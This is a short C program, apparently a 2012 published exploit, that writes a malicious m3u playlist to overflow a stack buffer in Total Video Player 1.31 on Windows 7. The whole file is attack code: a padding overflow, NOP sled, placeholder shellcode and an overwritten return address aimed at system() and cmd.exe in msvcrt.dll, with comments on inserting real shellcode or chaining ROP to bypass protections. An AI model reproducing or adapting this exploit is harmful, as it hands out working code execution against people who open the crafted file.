/*
28-08-2012
Total Video Player V1.31 m3u playlist exploit
Local Exploit
Written by GoTr00t
Tested on Windows 7
aksuumit[at]hotmail.com
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main()
{
char exploit[3000];
memset(exploit,0x00,sizeof(exploit));
char overflow[304];
memset(overflow,0x41,sizeof(overflow)-1);
char nops[40];
memset(nops,0x90,sizeof(nops));
char shellcode[160];
memset(shellcode,0x55,sizeof(shellcode));
char HEADER[] = "#EXTM3U\n#EXTINF:,\n";
// 7694B177 address of system in the msvcrt.dll
char newEIP[] = "\x77\xB1\x94\x76";
strcpy(exploit,HEADER);
strcat(exploit,"c:\\");
strcat(exploit,overflow);
strcat(exploit,nops);
strcat(exploit,shellcode); // fake shellcode because there are multiple ways to exploit this vulnerability you can place a shellcode here
strcat(exploit,newEIP); // and use this EIP to jump to the shellcode but for this example i use a return2dll technique
strcat(exploit,"\x44\x44\x44\x44"); // junk or you can use this one to jump to another dll to execute so you can do a ROP to bypass protection
// 7638BF27 cmd.exe
strcat(exploit,"\x27\xBF\x38\x76");
// Write a exploit playlist
FILE *fp = fopen("exploit.m3u","w");
fprintf(fp,exploit);
fclose(fp);
printf("Exploit written!\n");
return 0;
}
